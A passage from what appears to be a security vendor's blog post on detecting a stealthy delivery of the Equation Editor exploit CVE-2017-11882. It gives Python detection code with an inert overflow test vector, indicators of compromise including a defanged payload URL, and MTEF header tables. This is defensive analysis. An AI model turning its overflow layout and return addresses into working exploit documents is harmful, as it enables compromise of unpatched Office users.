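# CLSID from Figure 3 encoded as a binary GUID; every other constant is an assumption.
EQNEDT_CLSID = bytes.fromhex("02CE0200" "0000" "0000" "C000000000000046")
TYPESIZE_TAG, FONT_TAG = 0x0A, 0x08   # assumed MTEF record tags (as in public CVE-2017-11882 samples)
FONT_BUFFER_LEN = 36                  # assumed size of the fixed-size font name buffer
IMAGE_RANGE = (0x00400000, 0x0047FFFF)  # assumed EQNEDT32 image range; covers the three addresses above
SHELLCODE_ADDRS = {0x0045BD3C, 0x004667B0}  # values hardcoded by the shellcode (from the analysis)

def has_equation_editor_clsid(ole_object: bytes) -> bool:
    """Step 2: the Equation Editor CLSID is embedded in the OLE object itself."""
    return EQNEDT_CLSID in ole_object

def header_accepted(mtef: bytes) -> bool:
    """Equation Editor tests only bytes 0 and 2 of the 5-byte MTEF header (Table 2 values)."""
    return len(mtef) >= 5 and mtef[0] == 0x02 and mtef[2] == 0x01

def find_font_overflow(mtef: bytes):
    """Steps 4-6: walk the records after the header. Return (buffer_len, tail_address) when a
    FONT name buffer exceeds the fixed buffer and its last four bytes decode to an in-image
    address (the NUL terminating the name doubles as the address's top byte), else None."""
    i = 5
    while i < len(mtef):
        tag = mtef[i]
        if tag == TYPESIZE_TAG:           # two-byte record: tag + size
            i += 2
        elif tag == FONT_TAG:             # tag, typeface, style, NUL-terminated name
            nul = mtef.find(b"\x00", i + 3)
            end = len(mtef) if nul == -1 else nul + 1
            buf = mtef[i + 3:end]
            if len(buf) > FONT_BUFFER_LEN:
                addr = struct.unpack("<I", buf[-4:])[0]
                if IMAGE_RANGE[0] <= addr <= IMAGE_RANGE[1]:
                    return len(buf), addr
            i = end
        else:
            return None                   # unknown record: nothing left to pattern-match
    return None

def shellcode_addresses_present(mtef: bytes) -> set:
    """Extra signal: little-endian encodings of the addresses the shellcode hardcodes."""
    return {a for a in SHELLCODE_ADDRS if struct.pack("<I", a) in mtef}

# Constructed, inert test vector (no shellcode): Table 2 header, a TYPESIZE record, then a FONT
# record whose name is 40 filler bytes followed by the 0x445203 return target, then one address.
SAMPLE_MTEF = (bytes.fromhex("020801B9C9") + bytes([TYPESIZE_TAG, 0x01]) + bytes([FONT_TAG, 1, 1])
               + b"A" * 40 + struct.pack("<I", 0x00445203) + struct.pack("<I", 0x0045BD3C))
SAMPLE_OLE = b"\x00" * 16 + EQNEDT_CLSID + b"\x00" * 16   # stand-in for the raw OLE object bytes
print(has_equation_editor_clsid(SAMPLE_OLE), header_accepted(SAMPLE_MTEF),
      find_font_overflow(SAMPLE_MTEF), shellcode_addresses_present(SAMPLE_MTEF))
```

Note that the header check is tied to this sample's byte values; a rule covering other builder output would need the full set of values Equation Editor accepts, which is exactly the reverse-engineering effort the text argues a pattern-only approach cannot afford.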

Figure 6: Analysis overview of the document (sha1: cf63479cefc4984309e97ed71e34a078cbf21d6a).


Conclusions

The sample subject of our analysis did not use any new CVEs, but relied on an unexpected new way to deliver the old and well-known CVE-2017-11882. This particular way of delivering the exploit effectively evaded all static analyzers relying on OLE’s static information. As the exploit author managed to remove (intentionally?) all non-binary strings from the exploit data, he considerably raised the bar for a static analyzer to detect this specific exploit.

Having said that, Microsoft has already issued an advisory addressing this specific CVE, so previous mitigations are effective and still apply:

In conclusion, we verified whether MathType v7 (the successor of Equation Editor) was vulnerable to this specific parsing quirk when opening an Ole10Native stream, but we are glad to report that both mitigations, DEP and ASLR, are enabled, thereby protecting the binary from the aforementioned vulnerabilities.

Appendix

Indicator of Compromise | Description
cf63479cefc4984309e97ed71e34a078cbf21d6a | SHA1 malicious document
2bcd81a9f077ff3500de9a80b469d34a53d51f4a | SHA1 loki payload
hxxp://b.reich[.]io/hnepyp.scr | URL loki payload

Table 1: IoCs discussed in the blogpost.

Offset | Size (bytes) | Description | Value | Comment
0 | 1 | MTEF Version | 0x2 | Version 2
1 | 1 | Generating Platform | 0x8 | Garbage
2 | 1 | Generating Product | 0x1 | 1 for Equation Editor
3 | 1 | Product Version | 0xB9 | Garbage
4 | 1 | Product Subversion | 0xC9 | Garbage

Table 2: Ole10Native MTEF header.

Offset | Size (bytes) | Description
0x0 | 4 | Handle to the memory object storing the Ole10Native stream in memory
0x4 | 4 | Size in memory
0x8 | 4 | Size in memory
0x10 | 4 | Index of the byte which will be read next from the stream
0x14 | 4 | Unknown

Table 3: Temporary Structure Format.

The post Evading Static Analyzers by Solving the Equation (Editor) appeared first on Lastline.

Red Team Arsenal (RTA) – An intelligent scanner to detect security vulnerabilities in companies’ layer 7 assets.

Red Team Arsenal is a web/network security scanner which has the capability to scan all of a company’s online-facing assets and provide a holistic security view...
